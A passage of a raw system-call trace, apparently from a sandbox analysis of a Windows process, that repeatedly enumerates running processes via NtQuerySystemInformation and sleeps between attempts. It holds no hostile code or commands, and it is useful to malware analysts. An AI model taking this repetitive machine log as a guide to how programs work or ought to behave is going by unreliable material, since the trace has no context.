[0146.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.551] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.566] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.582] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.597] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.614] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.628] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.644] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.659] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.675] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.691] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.706] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.724] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.738] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.753] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.769] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.785] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.801] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.815] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.833] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.847] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.862] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 